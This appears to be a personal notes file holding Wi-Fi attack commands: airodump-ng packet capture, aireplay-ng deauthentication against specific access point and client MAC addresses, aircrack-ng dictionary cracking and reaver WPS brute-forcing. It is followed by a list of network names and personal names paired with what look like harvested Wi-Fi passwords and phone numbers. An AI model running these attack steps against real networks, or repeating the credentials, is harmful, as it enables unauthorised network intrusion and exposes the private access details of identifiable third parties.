sudo airodump-ng --bssid [name] -c [name hc] -w passwd wlp4s0mon
sudo aireplay-ng -0 0 -a bssid  -c station wlp4s0mon
sudo aireplay-ng -0 0 -a 84:74:2A:02:5A:7B -c 12:37:A9:36:7E:6C wlp4s0mon 
sudo aircrack-ng -w diccionario.lst pichuca02-01.cap
reaver -i wlp4s0mon -b C0:25:E9:97:45:F8  -vv -K 3 (opcional ESSID= -e)

reaver -i wlp4s0mon -b C0:25:E9:97:45:F8 -e [Nombre ESSID]  -vv -K 3 (opcional ESSID= -e)

sudo /opt/lampp/lampp start //////apache

gytuyfhhjjbbhbjjkjjjj, hggbhhhbnnnnhhh
ceibal:monicarodrigez
julio 35168437
2311658079: enzo
android_376c
Android_376csolciti
Android_376
Cerpros-2.4fGHz,Hector96
Arturo ,HUAWEI Y5 lite 2017
Florencia :router
TexasCompany
 (not associated)   2A:D2:D0:EC:DB:37  -90    0 - 1      0        3   pital riv agraria,
TP_LIKE 0985521339,
Hosera 15368437
bruno 99999555
CentroSantarosa:SantaRosa2018
59140752==Silvana
javier:098605667
Bruninho: 092402119  
Antel:MOVISTAR WIFI

